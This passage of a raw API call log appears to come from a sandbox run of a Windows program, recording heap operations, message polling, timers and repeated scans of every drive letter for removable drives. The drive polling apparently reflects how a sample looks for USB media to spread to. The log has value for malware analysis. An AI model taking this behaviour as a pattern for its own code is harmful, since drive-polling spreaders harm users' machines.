hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0217.075] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0217.075] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0217.075] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.075] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0217.075] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.075] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0217.075] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0217.075] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.075] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0217.075] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0217.075] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0217.075] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325fa0 [0217.075] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0217.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0217.075] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0217.075] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0217.075] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325fa0 | out: hHeap=0x12c0000) returned 1 [0217.076] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.076] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0217.076] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0217.076] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.076] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0217.076] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.076] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.076] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.076] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0217.076] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0217.076] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.076] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.076] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0217.076] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0217.076] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0217.077] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.077] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0217.077] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0217.077] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.077] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0217.077] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.077] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0217.077] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.077] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.077] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0217.077] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.077] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.077] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0217.077] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0217.077] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.078] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0217.078] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0217.078] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.078] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.078] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.078] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0217.078] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0217.078] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0217.078] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0217.078] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0217.078] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0217.079] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0217.079] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0217.079] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0217.079] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0217.080] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0217.080] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0217.080] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0217.081] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0217.081] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0217.081] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0217.081] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0217.081] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0217.082] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0217.082] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0217.082] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0217.082] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0217.083] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0217.083] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0217.083] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0217.083] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0217.084] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0217.084] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0217.084] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0217.084] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0217.085] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0217.085] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.085] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0217.085] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.085] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0217.085] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0217.085] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0217.092] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0217.092] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0217.092] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.092] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0217.092] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.092] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0217.092] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0217.092] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0217.092] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0217.092] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0217.092] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.092] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0217.093] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0217.093] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0217.093] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f40 [0217.093] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0217.093] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0217.093] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0217.093] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0217.093] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f40 | out: hHeap=0x12c0000) returned 1 [0217.093] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0217.093] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.093] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e540 [0217.093] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.093] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e540 | out: hHeap=0x12c0000) returned 1 [0217.093] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.093] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.093] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.093] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.093] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0217.093] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.093] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0217.093] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0217.093] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0217.093] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0217.093] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.094] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0217.094] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.094] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.094] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0217.094] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.094] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0217.094] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.094] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0217.094] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd208 [0217.094] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.094] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.094] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0217.094] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.095] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.095] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0217.095] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0217.095] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0217.095] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.095] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0217.095] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0217.095] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0217.095] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0217.095] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0217.095] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0217.095] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0217.096] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0217.096] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0217.096] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0217.096] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0217.097] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0217.097] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0217.097] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0217.097] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0217.097] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0217.098] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0217.098] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0217.098] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0217.098] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0217.098] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0217.099] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0217.099] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0217.099] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0217.099] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0217.099] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0217.099] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0217.100] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0217.100] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0217.100] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0217.100] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0217.100] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0217.100] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0217.100] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0217.101] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.101] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.101] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.101] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.101] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0217.101] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0217.101] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0217.101] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.101] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.101] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.101] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0217.101] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.101] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0217.101] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f20 [0217.101] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0217.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0217.101] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.101] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0217.101] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f20 | out: hHeap=0x12c0000) returned 1 [0217.101] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.101] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0217.101] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0217.101] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.101] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0217.101] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.102] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.102] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0217.102] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0217.102] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.102] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0217.102] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0217.102] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.102] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.102] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.102] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.102] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0217.102] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0217.103] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.103] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0217.103] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0217.103] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0217.103] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0217.103] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0217.103] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0217.103] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.103] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.103] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0217.103] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0217.103] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0217.103] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0217.103] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.103] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0217.103] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0217.103] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.103] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0217.104] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0217.104] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0217.104] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0217.104] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0217.104] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0217.104] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0217.104] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0217.105] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0217.105] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0217.105] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0217.105] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0217.106] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0217.106] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0217.106] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0217.107] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0217.107] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0217.107] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0217.107] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0217.107] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0217.108] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0217.108] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0217.108] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0217.108] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0217.108] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0217.109] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0217.109] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 